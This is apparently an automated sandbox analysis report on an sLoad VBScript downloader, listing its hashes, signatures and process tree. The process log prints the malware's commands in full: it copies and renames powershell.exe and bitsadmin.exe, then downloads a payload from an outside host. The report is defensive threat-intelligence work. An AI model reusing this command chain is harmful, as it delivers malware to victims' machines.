sload | 1dba2064e7290c1896d560ff266a18cb6bd9b7e82aad50ddcbe2afde3e43c53e | Triage

Analysis

max time kernel
27s
max time network
26s
platform
windows7_x64
resource
win7
submitted
14-09-2020 12:24

Sharing

Report Analysis Logs

General

Target

Allegato_doc_03675480267.vbs
Size

4KB
MD5

a824af955b840327f2cf795b1b7fcabf
SHA1

a13ec743a3a4476339c7e521e57b431355a5c67e
SHA256

1dba2064e7290c1896d560ff266a18cb6bd9b7e82aad50ddcbe2afde3e43c53e
SHA512

acab55eed2f7468495758666d67e9593eb9e32f44da823b2b0ac7560d78f76b0f1dded255f8f51a68023e3881fc46b1b362b1fb8c47517f5179fe26d7b5cba92

Score

10^/10

trojan stealer sload

Malware Config

Signatures

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload
Executes dropped EXE 1 IoCs

Processes:

WhZRIiim.exe

pid process

1796 WhZRIiim.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1144 wrote to memory of 1060	1144	WScript.exe	cmd.exe
PID 1144 wrote to memory of 1060	1144	WScript.exe	cmd.exe
PID 1144 wrote to memory of 1060	1144	WScript.exe	cmd.exe
PID 1144 wrote to memory of 1508	1144	WScript.exe	cmd.exe
PID 1144 wrote to memory of 1508	1144	WScript.exe	cmd.exe
PID 1144 wrote to memory of 1508	1144	WScript.exe	cmd.exe
PID 1144 wrote to memory of 1796	1144	WScript.exe	WhZRIiim.exe
PID 1144 wrote to memory of 1796	1144	WScript.exe	WhZRIiim.exe
PID 1144 wrote to memory of 1796	1144	WScript.exe	WhZRIiim.exe
PID 1144 wrote to memory of 1796	1144	WScript.exe	WhZRIiim.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_03675480267.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zWhZRIiim.exe
2⤵
PID:1060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\WhZRIiim.exe
2⤵
PID:1508

C:\Users\Admin\AppData\Roaming\WhZRIiim.exe
"C:\Users\Admin\AppData\Roaming\WhZRIiim.exe" /transfer szlqLE /download https://unequipoganador.com/ipol/03675480267/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg
2⤵
- Executes dropped EXE
PID:1796

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\WhZRIiim.exe

Download Submit
C:\Users\Admin\AppData\Roaming\WhZRIiim.exe

Download Submit
memory/1060-0-0x0000000000000000-mapping.dmp

Download
memory/1508-1-0x0000000000000000-mapping.dmp

Download
memory/1796-3-0x0000000000000000-mapping.dmp

Download